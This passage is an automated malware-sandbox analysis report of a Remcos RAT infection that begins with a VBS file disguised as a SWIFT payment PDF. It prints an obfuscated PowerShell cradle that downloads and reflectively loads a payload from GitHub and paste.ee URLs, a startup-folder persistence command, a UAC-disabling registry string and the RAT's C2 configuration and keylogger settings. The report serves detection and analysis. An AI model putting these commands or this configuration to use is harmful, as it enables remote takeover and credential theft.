            • chrome.exe (PID: 6552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1648 --field-trial-handle=1996,i,18342384901192943427,3001916881733487027,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 1276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2008,i,13349874762832594225,9819071068630656309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 2076 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 2928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1984,i,11069439797262297707,896590743492590315,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2360,i,8934632438909745951,2213681595228066499,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 5636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "ab9001.ddns.net:23782:1", "Assigned name": "OCTOBERS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "VLC.exe", "Startup value": "Rmc", "Hide file": "Disable", "Mutex": "Chrorne-K04X5E", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
    Source | Rule | Description | Author | Strings
    0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
      0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
      • 0x691e0:$a1: Remcos restarted by watchdog!
      • 0x69738:$a3: %02i:%02i:%02i:%03i
      • 0x69abd:$a4: * Remcos v
      0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
      • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
      • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x6320c:$str_b2: Executing file:
      • 0x64328:$str_b3: GetDirectListeningPort
      • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x63e30:$str_b7: \update.vbs
      • 0x63234:$str_b9: Downloaded file:
      • 0x63220:$str_b10: Downloading file:
      • 0x632c4:$str_b12: Failed to upload file:
      • 0x642f0:$str_b13: StartForward
      • 0x64310:$str_b14: StopForward
      • 0x63dd8:$str_b15: fso.DeleteFile "
      • 0x63d6c:$str_b16: On Error Resume Next
      • 0x63e08:$str_b17: fso.DeleteFolder "
      • 0x632b4:$str_b18: Uploaded file:
      • 0x63274:$str_b19: Unable to delete:
      • 0x63da0:$str_b20: while fso.FileExists("
      • 0x63749:$str_c0: [Firefox StoredLogins not found]
      0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows exceutables potentially bypassing UAC using eventvwr.exe | ditekSHen
      • 0x63100:$s1: \Classes\mscfile\shell\open\command
      • 0x63160:$s1: \Classes\mscfile\shell\open\command
      • 0x63148:$s2: eventvwr.exe
      0000000A.00000002.3370133817.000000000323F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
        Source | Rule | Description | Author | Strings
        10.2.AddInProcess32.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
          10.2.AddInProcess32.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
          • 0x679e0:$a1: Remcos restarted by watchdog!
          • 0x67f38:$a3: %02i:%02i:%02i:%03i
          • 0x682bd:$a4: * Remcos v
          10.2.AddInProcess32.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown
          • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x61a0c:$str_b2: Executing file:
          • 0x62b28:$str_b3: GetDirectListeningPort
          • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x62630:$str_b7: \update.vbs
          • 0x61a34:$str_b9: Downloaded file:
          • 0x61a20:$str_b10: Downloading file:
          • 0x61ac4:$str_b12: Failed to upload file:
          • 0x62af0:$str_b13: StartForward
          • 0x62b10:$str_b14: StopForward
          • 0x625d8:$str_b15: fso.DeleteFile "
          • 0x6256c:$str_b16: On Error Resume Next
          • 0x62608:$str_b17: fso.DeleteFolder "
          • 0x61ab4:$str_b18: Uploaded file:
          • 0x61a74:$str_b19: Unable to delete:
          • 0x625a0:$str_b20: while fso.FileExists("
          • 0x61f49:$str_c0: [Firefox StoredLogins not found]
          10.2.AddInProcess32.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows exceutables potentially bypassing UAC using eventvwr.exe | ditekSHen
          • 0x61900:$s1: \Classes\mscfile\shell\open\command
          • 0x61960:$s1: \Classes\mscfile\shell\open\command
          • 0x61948:$s2: eventvwr.exe
          8.2.powershell.exe.180e9fef678.1.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; 
[dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJys
            Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ParentProcessId: 1988, ParentProcessName: AddInProcess32.exe, ProcessCommandLine: svchost.exe, ProcessId: 6516, ProcessName: svchost.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs", CommandLine|base64offset|contains: M, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs", ProcessId: 3032, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.
            Source: Process startedAuthor: Tim Rauch: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: svchost.exe, ParentImage: C:\Windows\SysWOW64\svchost.exe, ParentProcessId: 6516, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 2316, ProcessName: conhost.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ParentProcessId: 1988, ParentProcessName: AddInProcess32.exe, ProcessCommandLine: svchost.exe, ProcessId: 6516, ProcessName: svchost.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs", CommandLine|base64offset|contains: M, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs", ProcessId: 3032, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')'), CommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5996, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')'), ProcessId: 1076, ProcessName: powershell.exe
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; 
[dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJys
            Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ParentProcessId: 1988, ParentProcessName: AddInProcess32.exe, ProcessCommandLine: svchost.exe, ProcessId: 6516, ProcessName: svchost.exe

            Stealing of Sensitive Information

            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 1988, TargetFilename: C:\ProgramData\remcos\logs.dat
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-10-04T11:33:52.342098+0200 | 2020423 | 1 | Exploit Kit Activity Detected | 188.114.97.3 | 443 | 192.168.2.5 | 49718 | TCP
            2024-10-04T11:33:52.342098+0200 | 2020425 | 1 | Exploit Kit Activity Detected | 188.114.97.3 | 443 | 192.168.2.5 | 49718 | TCP
            2024-10-04T11:33:28.433120+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 56037 | 64.188.16.157 | 23782 | TCP
            2024-10-04T11:34:14.382305+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 55396 | 64.188.16.157 | 23782 | TCP
            2024-10-04T11:34:36.751048+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 55594 | 64.188.16.157 | 23782 | TCP
            2024-10-04T11:34:59.536187+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 55821 | 64.188.16.157 | 23782 | TCP
            2024-10-04T11:35:21.954618+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 55924 | 64.188.16.157 | 23782 | TCP
            2024-10-04T11:35:44.377583+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 55993 | 64.188.16.157 | 23782 | TCP
            2024-10-04T11:33:52.166114+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49718 | 188.114.97.3 | 443 | TCP


            AV Detection

            Source: 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "ab9001.ddns.net:23782:1", "Assigned name": "OCTOBERS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "VLC.exe", "Startup value": "Rmc", "Hide file": "Disable", "Mutex": "Chrorne-K04X5E", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Source: ab9001.ddns.net | Virustotal: Detection: 15%
            Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt | Virustotal: Detection: 6%
            Source: https://paste.ee/d/XlUYO/0 | Virustotal: Detection: 6%
            Source: SWIFT 103 202406111301435660 110624-pdf.vbs | Virustotal: Detection: 8%
            Source: Yara match | File source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 10.2.AddInProcess32.exe.1587080.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3370133817.000000000323F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
